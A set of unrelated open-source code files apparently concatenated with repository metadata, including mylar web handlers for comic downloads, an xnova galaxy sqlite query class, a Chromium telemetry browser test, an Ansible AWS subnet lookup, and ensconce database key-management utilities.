logger.info('weeknumber: %s' % weeknumber)
logger.info('year: %s' % year)
weeklyresults = []
if weeknumber is not None:
myDB = db.DBConnection()
w_results = myDB.select("SELECT * from weekly WHERE weeknumber=? AND year=?", [int(weeknumber),int(year)])
watchlibrary = helpers.listLibrary()
issueLibrary = helpers.listIssues(weeknumber, year)
oneofflist = helpers.listoneoffs(weeknumber, year)
for weekly in w_results:
xfound = False
tmp_status = weekly['Status']
issdate = None
if weekly['ComicID'] in watchlibrary:
haveit = watchlibrary[weekly['ComicID']]
if all([mylar.CONFIG.AUTOWANT_UPCOMING, tmp_status == 'Skipped']):
tmp_status = 'Wanted'
for x in issueLibrary:
if weekly['IssueID'] == x['IssueID']:
xfound = True
tmp_status = x['Status']
issdate = x['IssueYear']
break
else:
xlist = [x['Status'] for x in oneofflist if x['IssueID'] == weekly['IssueID']]
if xlist:
haveit = 'OneOff'
tmp_status = xlist[0]
issdate = None
else:
haveit = "No"
x = None
try:
x = float(weekly['ISSUE'])
except ValueError, e:
if 'au' in weekly['ISSUE'].lower() or 'ai' in weekly['ISSUE'].lower() or '.inh' in weekly['ISSUE'].lower() or '.now' in weekly['ISSUE'].lower() or '.mu' in weekly['ISSUE'].lower() or '.hu' in weekly['ISSUE'].lower():
x = weekly['ISSUE']
if x is not None:
weeklyresults.append({
"PUBLISHER": weekly['PUBLISHER'],
"ISSUE": weekly['ISSUE'],
"COMIC": weekly['COMIC'],
"STATUS": tmp_status,
"COMICID": weekly['ComicID'],
"ISSUEID": weekly['IssueID'],
"HAVEIT": haveit,
"ISSUEDATE": issdate
})
weeklylist = sorted(weeklyresults, key=itemgetter('PUBLISHER', 'COMIC'), reverse=False)
for ab in weeklylist:
if ab['HAVEIT'] == ab['COMICID']:
lb = myDB.selectone('SELECT ComicVersion, Type, ComicYear from comics WHERE ComicID=?', [ab['COMICID']]).fetchone()
issuelist.append({'IssueNumber': ab['ISSUE'],
'ComicName': ab['COMIC'],
'ComicID': ab['COMICID'],
'IssueID': ab['ISSUEID'],
'Status': ab['STATUS'],
'Publisher': ab['PUBLISHER'],
'ComicVolume': lb['ComicVersion'],
'ComicYear': lb['ComicYear'],
'ComicType': lb['Type'],
'IssueYear': ab['ISSUEDATE']})
from mylar import cbl
ab = cbl.dict2xml(issuelist)
#a = cbl.CreateList(issuelist)
#ab = a.createComicRackReadlist()
logger.info('returned.')
logger.info(ab)
create_readlist.exposed = True
def downloadBanner(self, **kwargs):
storyarcid = kwargs['storyarcid']
url = kwargs['url']
storyarcname = kwargs['storyarcname']
logger.info('storyarcid: %s' % storyarcid)
logger.info('url: %s' % url)
ext = url[-4:]
for i in ['.jpg', '.png', '.jpeg']:
if i in url:
ext = i
break
banner = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', (str(storyarcid) + '-banner' + ext))
r = requests.get(url, stream=True)
if str(r.status_code) != '200':
logger.warn('Unable to download image from URL: %s [Status Code returned:%s]' % (url, r.status_code))
else:
if r.headers.get('Content-Encoding') == 'gzip':
import gzip
from StringIO import StringIO
buf = StringIO(r.content)
f = gzip.GzipFile(fileobj=buf)
with open(banner, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
f.flush()
logger.info('Successfully wrote image to cache directory: %s' % banner)
import get_image_size
image = get_image_size.get_image_metadata(banner)
imageinfo = json.loads(get_image_size.Image.to_str_json(image))
logger.info('imageinfo: %s' % imageinfo)
raise cherrypy.HTTPRedirect("detailStoryArc?StoryArcID=%s&StoryArcName=%s" % (storyarcid, storyarcname))
downloadBanner.exposed = True
def manageBanner(self, comicid, action, height=None, width=None):
rootpath = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs')
if action == 'delete':
delete = False
ext = ['.jpg', '.png', '.jpeg']
loc = os.path.join(rootpath, str(comicid) + '-banner')
for x in ['.jpg', '.png', '.jpeg']:
if os.path.isfile(loc +x):
os.remove(loc+x)
deleted = True
break
if deleted is True:
logger.info('Successfully deleted banner image for the given storyarc.')
else:
logger.warn('Unable to located banner image in cache folder...')
elif action == 'save':
filename = None
dir = os.listdir(rootpath)
for fname in dir:
if str(comicid) in fname:
ext = os.path.splitext(fname)[1]
filepath = os.path.join(rootpath, fname)
break
#if 'H' in fname:
# bannerheight = fname[fname.find('H')+1:fname.find('.')]
# logger.info('bannerheight found at : %s' % bannerheight)
#ext = ['.jpg', '.png', '.jpeg']
#ext = None
#loc = os.path.join(mylar.CONFIG.CACHE_DIR, 'storyarcs', str(comicid) + '-banner')
#for x in ['.jpg', '.png', '.jpeg']:
# if os.path.isfile(loc +x):
# ext = x
# break
if filepath is not None:
os.rename(filepath, os.path.join(rootpath, (str(comicid) + '-bannerH' + str(height) + ext)))
logger.info('successfully saved %s to new dimensions of banner : 960 x %s' % (str(comicid) + '-bannerH' + str(height) + ext, height))
else:
logger.warn('unable to locate %s in cache directory in order to save' % filepath)
manageBanner.exposed = True
def choose_specific_download(self, **kwargs): #manual=True):
try:
action = kwargs['action']
except:
action = False
try:
comicvolume = kwargs['comicvolume']
except:
comicvolume = None
if all([kwargs['issueid'] != 'None', kwargs['issueid'] is not None]) and action is False:
issueid = kwargs['issueid']
logger.info('checking for: %s' % issueid)
results = search.searchforissue(issueid, manual=True)
else:
results = self.queueissue(kwargs['mode'], ComicName=kwargs['comicname'], ComicID=kwargs['comicid'], IssueID=kwargs['issueid'], ComicIssue=kwargs['issue'], ComicVersion=comicvolume, Publisher=kwargs['publisher'], pullinfo=kwargs['pullinfo'], pullweek=kwargs['pullweek'], pullyear=kwargs['pullyear'], manual=True)
myDB = db.DBConnection()
r = []
for x in mylar.COMICINFO: #results:
ctrlval = {'provider': x['provider'],
'id': x['nzbid']}
newval = {'kind': x['kind'],
'sarc': x['SARC'],
'issuearcid': x['IssueArcID'],
'comicname': x['ComicName'],
'comicid': x['ComicID'],
'issueid': x['IssueID'],
'issuenumber': x['IssueNumber'],
'volume': x['ComicVolume'],
'oneoff': x['oneoff'],
'fullprov': x['nzbprov'],
'modcomicname': x['modcomicname'],
'name': x['nzbtitle'],
'link': x['link'],
'size': x['size'],
'pack_numbers': x['pack_numbers'],
'pack_issuelist': x['pack_issuelist'],
'comicyear': x['comyear'],
'issuedate': x['IssueDate'],
'tmpprov': x['tmpprov'],
'pack': x['pack']}
myDB.upsert('manualresults', newval, ctrlval)
r.append({'kind': x['kind'],
'provider': x['provider'],
'nzbtitle': x['nzbtitle'],
'nzbid': x['nzbid'],
'size': x['size'][:-1],
'tmpprov': x['tmpprov']})
#logger.fdebug('results returned: %s' % r)
cherrypy.response.headers['Content-type'] = 'application/json'
return json.dumps(r)
choose_specific_download.exposed = True
def download_specific_release(self, nzbid, provider, name):
myDB = db.DBConnection()
dsr = myDB.selectone('SELECT * FROM manualresults WHERE id=? AND tmpprov=? AND name=?', [nzbid, provider, name]).fetchone()
if dsr is None:
logger.warn('Unable to locate result - something is wrong. Try and manually search again?')
return
else:
oneoff = bool(int(dsr['oneoff']))
try:
pack = bool(int(dsr['pack']))
except:
pack = False
comicinfo = [{'ComicName': dsr['comicname'],
'ComicVolume': dsr['volume'],
'IssueNumber': dsr['issuenumber'],
'comyear': dsr['comicyear'],
'IssueDate': dsr['issuedate'],
'pack': pack,
'modcomicname': dsr['modcomicname'],
'oneoff': oneoff,
'SARC': dsr['sarc'],
'IssueArcID': dsr['issuearcid']}]
#logger.info('comicinfo: %s' % comicinfo)
newznabinfo = None
if dsr['kind'] == 'usenet':
link = dsr['link']
for newznab_info in mylar.CONFIG.EXTRA_NEWZNABS:
if dsr['provider'].lower() in newznab_info[0].lower():
if (newznab_info[5] == '1' or newznab_info[5] == 1):
if newznab_info[1].endswith('/'):
newznab_host = newznab_info[1]
else:
newznab_host = newznab_info[1] + '/'
newznab_api = newznab_info[3]
newznab_uid = newznab_info[4]
link = str(newznab_host) + 'api?apikey=' + str(newznab_api) + '&t=get&id=' + str(dsr['id'])
logger.info('newznab detected as : ' + str(newznab_info[0]) + ' @ ' + str(newznab_host))
logger.info('link : ' + str(link))
newznabinfo = (newznab_info[0], newznab_info[1], newznab_info[2], newznab_info[3], newznab_info[4])
else:
logger.error(str(newznab_info[0]) + ' is not enabled - unable to process retry request until provider is re-enabled.')
break
else:
link = nzbid
if oneoff is True:
mode = 'pullwant'
else:
mode = 'series'
try:
nzbname = search.nzbname_create(dsr['fullprov'], info=comicinfo, title=dsr['name'])
sresults = search.searcher(dsr['fullprov'], nzbname, comicinfo, link=link, IssueID=dsr['issueid'], ComicID=dsr['comicid'], tmpprov=dsr['tmpprov'], directsend=True, newznab=newznabinfo)
if sresults is not None:
updater.foundsearch(dsr['ComicID'], dsr['IssueID'], mode='series', provider=dsr['tmpprov'], hash=sresults['t_hash'])
except:
return False #json.dumps({'result': 'failure'})
else:
return True #json.dumps({'result': 'success'})
download_specific_release.exposed = True
def read_comic(self, ish_id, page_num, size):
from mylar.webviewer import WebViewer
wv = WebViewer()
page_num = int(page_num)
#cherrypy.session['ishid'] = ish_id
data = wv.read_comic(ish_id, page_num, size)
#data = wv.read_comic(ish_id)
return data
read_comic.exposed = True
|
evilhero/mylar
|
mylar/webserve.py
|
Python
|
gpl-3.0
| 350,353
|
# -*- coding: utf-8 -*-
import sqlite3
class GalaxyDB:
PLANET_TYPE_PLANET = 1
PLANET_TYPE_BASE = 5
def __init__(self):
self._conn = sqlite3.connect('galaxy5.db')
self._conn.row_factory = sqlite3.Row
self._cur = self._conn.cursor()
self._log_queries = False
def create_query(self, where_clause=None, sort_col=None, sort_order=None):
q = 'SELECT g,s,p, \n' \
' planet_id, planet_name, planet_type, planet_metal, planet_crystal, planet_destroyed, \n' \
' luna_id, luna_name, luna_diameter, luna_destroyed, \n' \
' user_id, user_name, user_rank, user_onlinetime, user_banned, user_ro, user_race, \n' \
' ally_id, ally_name, ally_tag, ally_members \n' \
' FROM planets'
if where_clause is not None:
q += ' \n'
q += where_clause
# sort, order
q += '\n ORDER BY '
# fix invalid input
if sort_order is not None:
if sort_order not in ['asc', 'desc']:
sort_order = None
if sort_col is not None:
if sort_col not in ['planet_name', 'planet_type', 'user_name', 'user_rank', 'ally_name', 'luna_name']:
sort_col = None
# append sorting
if sort_col is not None:
q += sort_col
if sort_order is not None:
q += ' '
q += sort_order
q += ', '
q += 'g ASC, s ASC, p ASC' # by default, always sort by coords
# log query
if self._log_queries:
try:
with open('queries.log', mode='at', encoding='UTF-8') as f:
f.write(q)
f.write('\n')
except IOError:
pass
return q
@staticmethod
def safe_int(val):
if val is None:
return 0
try:
r = int(val)
except ValueError:
r = 0
return r
@staticmethod
def safe_str(val):
if val is None:
return ''
return str(val)
def _rows_to_res_list(self):
rows_list = []
rows = self._cur.fetchall()
for row in rows:
r = dict()
r['coords'] = '[{0}:{1}:{2}]'.format(row['g'], row['s'], row['p'])
r['coords_link'] = '<a href="http://uni5.xnova.su/galaxy/{3}/{4}/" target="_blank">' \
'[{0}:{1}:{2}]</a>'.format(row['g'], row['s'], row['p'],
row['g'], row['s'])
r['planet_id'] = GalaxyDB.safe_int(row['planet_id'])
r['planet_name'] = GalaxyDB.safe_str(row['planet_name'])
r['planet_type'] = GalaxyDB.safe_int(row['planet_type'])
r['user_id'] = GalaxyDB.safe_int(row['user_id'])
r['user_name'] = GalaxyDB.safe_str(row['user_name'])
r['user_rank'] = GalaxyDB.safe_int(row['user_rank'])
r['user_onlinetime'] = GalaxyDB.safe_int(row['user_onlinetime'])
r['user_banned'] = GalaxyDB.safe_int(row['user_banned'])
r['user_ro'] = GalaxyDB.safe_int(row['user_ro'])
# fix user name to include extra data
user_flags = ''
if r['user_ro'] > 0:
user_flags += 'U'
if r['user_banned'] > 0:
user_flags += 'G'
if r['user_onlinetime'] == 1:
user_flags += 'i'
if r['user_onlinetime'] == 2:
user_flags += 'I'
if user_flags != '':
r['user_name'] += ' (' + user_flags + ')'
# user race and race icon
r['user_race'] = GalaxyDB.safe_int(row['user_race'])
r['user_race_img'] = '<img border="0" src="css/icons/race{0}.png" width="18" />'.format(r['user_race'])
r['ally_name'] = GalaxyDB.safe_str(row['ally_name'])
r['ally_tag'] = GalaxyDB.safe_str(row['ally_tag'])
r['ally_members'] = GalaxyDB.safe_int(row['ally_members'])
# process ally info
if r['ally_tag'] != r['ally_name']:
r['ally_name'] += ' [{0}]'.format(r['ally_tag'])
r['ally_name'] += ' ({0} тел)'.format(r['ally_members'])
if r['ally_members'] == 0:
r['ally_name'] = ''
r['luna_name'] = GalaxyDB.safe_str(row['luna_name'])
r['luna_diameter'] = GalaxyDB.safe_int(row['luna_diameter'])
# process luna
if (r['luna_name'] != '') and (r['luna_diameter'] > 0):
r['luna_name'] += ' ({0})'.format(r['luna_diameter'])
# process planet type (detect bases)
if r['planet_type'] == GalaxyDB.PLANET_TYPE_BASE:
r['planet_name'] += ' (base)'
rows_list.append(r)
res_dict = dict()
res_dict['rows'] = rows_list
return res_dict
def query_like(self, col_name, value, sort_col=None, sort_order=None):
if type(col_name) == str:
where = 'WHERE ' + col_name + ' LIKE ?'
params = (value, )
elif type(col_name) == list:
where = 'WHERE'
params = list()
for col in col_name:
where += ' '
where += col
where += ' LIKE ? OR'
params.append(value)
where = where[0:-2]
else:
where = None
params = None
q = self.create_query(where, sort_col, sort_order)
self._cur.execute(q, params)
return self._rows_to_res_list()
def query_inactives(self, user_flags, gal_ints, s_min, s_max, min_rank=0, sort_col=None, sort_order=None):
user_where = ''
gals_where = ''
syss_where = ''
rank_where = ''
# user flags
# user online time
user_ot = ''
if 'i' in user_flags:
user_ot = 'user_onlinetime=1'
if 'I' in user_flags:
user_ot = 'user_onlinetime>0'
user_where += user_ot
# user banned or not banned, exlusively set
if 'G' in user_flags:
if user_where != '':
user_where += ' AND '
user_where += 'user_banned>0'
else:
if user_where != '':
user_where += ' AND '
user_where += 'user_banned=0'
# user ro or not, exclusively
if 'U' in user_flags:
if user_where != '':
user_where += ' AND '
user_where += 'user_ro>0'
else:
if user_where != '':
user_where += ' AND '
user_where += 'user_ro=0'
# galaxies
if type(gal_ints) == list:
gals_where = 'g IN ('
for g in gal_ints:
gals_where += '{0},'.format(g)
gals_where = gals_where[0:-1]
gals_where += ')'
# systems
if s_min <= s_max:
syss_where = 's BETWEEN {0} AND {1}'.format(s_min, s_max)
# rank
if min_rank > 0:
rank_where = ' AND (user_rank BETWEEN 1 AND {0})'.format(min_rank)
# final WHERE clause
where = 'WHERE ({0}) AND ({1}) AND ({2}) {3}'.format(user_where, gals_where, syss_where, rank_where)
q = self.create_query(where, sort_col, sort_order)
self._cur.execute(q)
return self._rows_to_res_list()
def query_planets_count(self, gal: int, sys_: int) -> int:
self._cur.execute('SELECT COUNT(*) FROM planets WHERE g=? AND s=?', (gal, sys_))
rows = self._cur.fetchall()
assert len(rows) == 1
assert len(rows[0]) == 1
return self.safe_int(rows[0][0])
def query_player_planets(self, player_name: str) -> list:
q = 'SELECT g,s,p, planet_name, planet_type, luna_name, luna_diameter \n' \
' FROM planets WHERE user_name=?'
self._cur.execute(q, (player_name,))
ret = []
for row in self._cur.fetchall():
p = dict()
p['g'] = GalaxyDB.safe_int(row['g'])
p['s'] = GalaxyDB.safe_int(row['s'])
p['p'] = GalaxyDB.safe_int(row['p'])
p['planet_name'] = GalaxyDB.safe_str(row['planet_name'])
p['planet_type'] = GalaxyDB.safe_int(row['planet_type'])
p['luna_name'] = GalaxyDB.safe_str(row['luna_name'])
p['luna_diameter'] = GalaxyDB.safe_int(row['luna_diameter'])
ret.append(p)
return ret
|
minlexx/xnova_galaxy_parser
|
site_uni5/classes/galaxy_db.py
|
Python
|
gpl-3.0
| 8,514
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import unittest
from telemetry.core import browser_finder
from telemetry.unittest import options_for_unittests
class BrowserTest(unittest.TestCase):
def setUp(self):
self._browser = None
def CreateBrowser(self,
extra_browser_args=None,
profile_type=None):
assert not self._browser
options = options_for_unittests.GetCopy()
if profile_type:
# TODO(jeremy): crbug.com/243912 profiles are only implemented on
# Desktop.
is_running_on_desktop = not (
options.browser_type.startswith('android') or
options.browser_type.startswith('cros'))
if not is_running_on_desktop:
logging.warn("Desktop-only test, skipping.")
return None
options.profile_type = profile_type
if extra_browser_args:
options.extra_browser_args.extend(extra_browser_args)
browser_to_create = browser_finder.FindBrowser(options)
if not browser_to_create:
raise Exception('No browser found, cannot continue test.')
self._browser = browser_to_create.Create()
unittest_data_dir = os.path.join(os.path.dirname(__file__),
'..', '..', 'unittest_data')
self._browser.SetHTTPServerDirectories(unittest_data_dir)
return self._browser
def tearDown(self):
if self._browser:
self._browser.Close()
def testBrowserCreation(self):
b = self.CreateBrowser()
self.assertEquals(1, len(b.tabs))
# Different browsers boot up to different things.
assert b.tabs[0].url
def testCommandLineOverriding(self):
# This test starts the browser with --user-agent=telemetry. This tests
# whether the user agent is then set.
flag1 = '--user-agent=telemetry'
b = self.CreateBrowser(extra_browser_args=[flag1])
t = b.tabs[0]
t.Navigate(b.http_server.UrlOf('blank.html'))
t.WaitForDocumentReadyStateToBeInteractiveOrBetter()
self.assertEquals(t.EvaluateJavaScript('navigator.userAgent'),
'telemetry')
def testVersionDetection(self):
b = self.CreateBrowser()
v = b._browser_backend._inspector_protocol_version # pylint: disable=W0212
self.assertTrue(v > 0)
v = b._browser_backend._chrome_branch_number > 0 # pylint: disable=W0212
self.assertTrue(v > 0)
def testNewCloseTab(self):
b = self.CreateBrowser()
if not b.supports_tab_control:
logging.warning('Browser does not support tab control, skipping test.')
return
existing_tab = b.tabs[0]
self.assertEquals(1, len(b.tabs))
existing_tab_url = existing_tab.url
new_tab = b.tabs.New()
self.assertEquals(2, len(b.tabs))
self.assertEquals(existing_tab.url, existing_tab_url)
self.assertEquals(new_tab.url, 'about:blank')
new_tab.Close()
self.assertEquals(1, len(b.tabs))
self.assertEquals(existing_tab.url, existing_tab_url)
def testMultipleTabCalls(self):
b = self.CreateBrowser()
b.tabs[0].Navigate(b.http_server.UrlOf('blank.html'))
b.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()
def testTabCallByReference(self):
b = self.CreateBrowser()
tab = b.tabs[0]
tab.Navigate(b.http_server.UrlOf('blank.html'))
b.tabs[0].WaitForDocumentReadyStateToBeInteractiveOrBetter()
def testCloseReferencedTab(self):
b = self.CreateBrowser()
if not b.supports_tab_control:
logging.warning('Browser does not support tab control, skipping test.')
return
b.tabs.New()
tab = b.tabs[0]
tab.Navigate(b.http_server.UrlOf('blank.html'))
tab.Close()
self.assertEquals(1, len(b.tabs))
def testDirtyProfileCreation(self):
b = self.CreateBrowser(profile_type = 'small_profile')
# TODO(jeremy): crbug.com/243912 profiles are only implemented on Desktop
if not b:
return
self.assertEquals(1, len(b.tabs))
|
pozdnyakov/chromium-crosswalk
|
tools/telemetry/telemetry/core/browser_unittest.py
|
Python
|
bsd-3-clause
| 4,041
|
# (c) 2015, Jon Hadfield <jon@lessknown.co.uk>
"""
Description: This lookup takes an AWS region and a list of one or more
subnet names and returns a list of matching subnet ids.
Example Usage:
{{ lookup('aws_subnet_ids_from_names', ('eu-west-1', ['subnet1', 'subnet2'])) }}
"""
from ansible import errors
try:
import boto.vpc
except ImportError:
raise errors.AnsibleError("aws_subnet_ids_from_names lookup cannot be run without boto installed")
class LookupModule(object):
def __init__(self, basedir=None, **kwargs):
self.basedir = basedir
def run(self, terms, inject=None, **kwargs):
if isinstance(terms, basestring):
terms = [terms]
subnet_ids = []
region = terms[0]
subnet_names = terms[1]
vpc_conn = boto.vpc.connect_to_region(region)
filters = {'tag:Name': terms[1]}
subnets = vpc_conn.get_all_subnets(filters=filters)
subnet_ids = [x.id.encode('utf-8') for x in subnets]
return subnet_ids
|
jonhadfield/ansible-lookups
|
v1/aws_subnet_ids_from_names.py
|
Python
|
mit
| 1,007
|
"""
Database crypto.
"""
import binascii
from sqlalchemy import func, and_
from sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound
from Crypto.Random import get_random_bytes
from Crypto.Protocol.KDF import PBKDF2
from ensconce import model, exc
from ensconce.model import meta
from ensconce.crypto import engine, state, MasterKey, CombinedMasterKey
from ensconce.autolog import log
def configure_crypto_state(passphrase):
"""
Convenience function to sets up the shared crypto state using the specified passphrase.
This function assumes that the metadata for this key has already been initialized.
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
key = derive_configured_key(passphrase)
# TODO: Consider moving the key validation in here instead.
state.secret_key = key
def derive_configured_key(passphrase):
"""
Derives a key with specified passphrase and stored salt using PBKDF2 algorithm.
:param passphrase: A passphrase string of any length, will be used to create the keys.
:type passphrase: str
:return: The encryption and signing key set.
:rtype: ensconce.crypto.MasterKey
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if isinstance(passphrase, unicode):
passphrase = passphrase.encode("utf-8")
if not isinstance(passphrase, str):
raise TypeError("Passphrase must be bytestring.")
if meta.Session is None:
raise exc.UnconfiguredModel()
# We assume that the mission is to look up an existing key.
session = meta.Session()
try:
key_info = session.query(model.KeyMetadata).one()
salt = key_info.kdf_salt
except NoResultFound:
raise exc.MissingKeyMetadata()
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
return derive_key(passphrase, salt)
def derive_key(passphrase, salt):
"""
Creates a key from passphrase and salt using PBKDF2.
:param passphrase: A passphrase string of any length, will be used to create the keys.
:type passphrase: str
:param salt: The initialization salt. This does not need to be kept secret, but should
be different for each installation of the software to protect against
precomputing-hash attacks (ranbow tables). The standard recommends this
be at least 64-bits, so we will throw an exception if it is smaller.
:type salt: str
:return: The encryption and signing key set.
:rtype: ensconce.crypto.MasterKey
"""
if isinstance(passphrase, unicode):
passphrase = passphrase.encode("utf-8")
if not isinstance(passphrase, str):
raise TypeError("Passphrase must be bytestring.")
if not isinstance(salt, str):
raise TypeError("Salt must be bytestring.")
if len(salt) < 8:
raise ValueError("Salt must be at least 64 bits (8 bytes).")
return CombinedMasterKey(PBKDF2(passphrase, salt, dkLen=64))
def load_secret_key_file(secret_key_file):
"""
Loads a secret key from a file and initializes the engine with this key.
This is designed for use in development/debugging and should NOT be used
in production, if you value the encrypted database data.
:param secret_key_file: The path to a file containing the 32-byte secret key.
:type secret_key_file: str
:raise ensconce.exc.CryptoNotInitialized: If the engine cannot be initialized.
"""
try:
with open(secret_key_file) as fp:
key_bytes = binascii.unhexlify(fp.read().strip())
log.info("Using DEBUG secret.key from file: {0}".format(secret_key_file))
try:
secret_key = CombinedMasterKey(key_bytes)
validate_key(key=secret_key)
except exc.MissingKeyMetadata:
log.info("Writng out DEBUG secret.key to key metadata row.")
initialize_key_metadata(key=secret_key, salt=get_random_bytes(16))
state.secret_key = secret_key
except:
log.exception("Unable to initialize secret key from file.")
raise exc.CryptoNotInitialized("Crypto engine has not been initialized.")
def validate_key(key):
"""
Checks the key against an encrypted blob in the database.
:param key: The master key to check.
:type key: ensconce.crypto.MasterKey
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
key_info = session.query(model.KeyMetadata).one()
#log.debug("Got bytes for validation: {0!r}".format(key_info.validation))
try:
decrypted = engine.decrypt(key_info.validation, key=key)
#log.debug("Decrypts to: {0!r}".format(decrypted))
except exc.CryptoAuthenticationFailed:
log.exception("Validation fails due to error decrypting block.")
return False
else:
return True
except NoResultFound:
raise exc.MissingKeyMetadata()
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
except:
log.exception("Error validating encryption key.")
raise
def has_encrypted_data():
"""
Whether there is any encrypted data in the database.
The answer to this question can help determine whether it's ok to change
encryption keys w/o re-encrypting database, etc.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
try:
session = meta.Session()
p_t = model.passwords_table
r_t = model.resources_table
pw_cnt = session.query(func.count(p_t.c.id)).filter(and_(p_t.c.password != None, p_t.c.password != '')).scalar()
rs_cnt = session.query(func.count(r_t.c.id)).filter(and_(r_t.c.notes != None, r_t.c.notes != '')).scalar()
except:
log.exception("Error checking for encrypted database data.")
raise
return (pw_cnt > 0 or rs_cnt > 0)
def create_key_validation_payload(key=None):
"""
Utility function to create the encrypted payload that we will late use for key validation.
TODO: Consider replacing with something smarter. HMAC?
"""
some_bytes = get_random_bytes(256)
return engine.encrypt(some_bytes, key=key)
def clear_key_metadata():
"""
This is a utility function (built for testing) that just removes any key_metadata
rows (with the intent that they will get re-created during crypto initialization phase).
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
"""
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
session.execute(model.key_metadata_table.delete())
session.commit() # We are deliberately committing early here
except:
session.rollback()
log.exception("Error clearing key metadata table.")
raise
def initialize_key_metadata(key, salt, force_overwrite=False, nested_transaction=False):
"""
Called when key is first specified to set some database encrypted contents.
This must be run before the crypto engine has been initialized with the secret
key.
:param key: The new encryption and signing key set.
:type key: ensconce.crypto.MasterKey
:param salt: The salt to use for the KDF function. IMPORTANT: This cannot change w/o re-encrypting database.
:type salt: str
:param force_overwrite: Whether to delete any existing metadata first (dangerous!)
:type force_overwrite: bool
:param nested_transaction: Whether this is being run within an existing transaction (i.e. do not commit).
:type nested_transaction: bool
:raise ensconce.exc.CryptoAlreadyInitialized: If the engine has already been initialized we bail out.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
:raise ensconce.exc.ExistingKeyMetadata: If there is already key metadata (and `force_overwrite` param is not `True`).
"""
assert isinstance(key, MasterKey)
assert isinstance(salt, str)
if state.initialized:
raise exc.CryptoAlreadyInitialized()
if meta.Session is None:
raise exc.UnconfiguredModel()
session = meta.Session()
try:
existing_keys = session.query(model.KeyMetadata).all()
if len(existing_keys) > 0:
if force_overwrite:
for ek in existing_keys:
session.delete(ek)
log.warning("Forcibly removing existing metadata: {0}".format(ek))
session.flush()
else:
raise exc.ExistingKeyMetadata()
km = model.KeyMetadata()
km.id = 0 # Chosen to be obviously out of auto-increment "range"
km.validation = create_key_validation_payload(key=key)
km.kdf_salt = salt
session.add(km)
if not nested_transaction:
session.commit() # We are deliberately committing early here
else:
session.flush()
except:
if not nested_transaction:
# This conditional probably has little effect, since the connection will be in err state anyway
# until a rollback is issued.
session.rollback()
log.exception("Error initializing key metadata")
raise
def replace_key(new_key, force=False):
"""
Replaces the database key. If there are encrypted contents in the database, you
must specify force=True which will *reencrypt* the database contents with the new key.
This is dangerous.
!!!! BACKUP FIRST !!!!
!!!! STOP WEB SERVER !!!!
:param new_key: The new encryption key.
:raise ensconce.exc.CryptoNotInitialized: If the engine has not been initialized (with the correct current key).
:raise ensconce.exc.MissingKeyMetadata: If the metadata row does not exist yet.
:raise ensconce.exc.MultipleKeyMetadata: If there are multiple metadata rows.
:raise ensconce.exc.UnconfiguredModel: If we can't create an SA session.
:raise ensconce.exc.DatabaseAlreadyEncrypted: If database has encrypted data and `force` param is not `True`.
"""
assert isinstance(new_key, MasterKey)
if not state.initialized:
raise exc.CryptoNotInitialized()
if meta.Session is None:
raise exc.UnconfiguredModel()
if has_encrypted_data() and not force:
raise exc.DatabaseAlreadyEncrypted("Database has existing encrypted data (must specify force to reencrypt existing data).")
session = meta.Session()
assert session.autocommit == False
with state.key_lock:
try:
key_info = session.query(model.KeyMetadata).one()
pass_t = model.passwords_table
# Re-encrypt all of the passwords with the new key.
for pw in session.query(model.Password).filter(and_(pass_t.c.password != None, pass_t.c.password != '')):
# Important: set the *encrypted* password here (not password_decrypted)
pw.password = engine.encrypt(pw.password_decrypted, key=new_key)
session.flush()
ph_t = model.password_history_table
for pwh in session.query(model.PasswordHistory).filter(and_(ph_t.c.password != None, ph_t.c.password != '')):
# Important: set the *encrypted* password here (not password_decrypted)
pwh.password = engine.encrypt(pwh.password_decrypted, key=new_key)
session.flush()
# Re-encrypt all of the notes fields for resources
resources_t = model.resources_table
for rsc in session.query(model.Resource).filter(and_(resources_t.c.notes != None, resources_t.c.notes != '')):
# Important: set the *encrypted* password here (not password_decrypted)
rsc.notes = engine.encrypt(rsc.notes_decrypted, key=new_key)
session.flush()
key_info.validation = create_key_validation_payload(key=new_key)
session.flush()
state.secret_key = new_key
except NoResultFound:
raise exc.MissingKeyMetadata("No key metadata found; initialize key metadata before replacing key.")
except MultipleResultsFound:
raise exc.CryptoError("Multiple key metadata rows are not supported.")
except:
session.rollback()
log.exception("Error replacing key; rolling back transaction.")
raise
else:
session.commit()
|
EliAndrewC/ensconce
|
ensconce/crypto/util.py
|
Python
|
bsd-3-clause
| 13,559
|
CHECKPOINT_FREQUENCY = 100
CHECKPOINT_MIN_WAIT = 300
DEFAULT_PROCESSOR_CHUNK_SIZE = 10
|
dimagi/commcare-hq
|
corehq/ex-submodules/pillowtop/const.py
|
Python
|
bsd-3-clause
| 88
|
'''
Created on Apr 18, 2010
@author: ulno
Create from the images path the corresponding directory in images.
inkscape is needed for this
'''
import glob
import sys
import os
import re
import subprocess
import distutils.dir_util
import pygame
# the source images in SVG
IMAGE_DIRECTORY=os.path.join("..","images")
# the directory where the images will be saved
#OUTPUT_DIRECTORY=os.path.join("..","..","android","assets","entities")
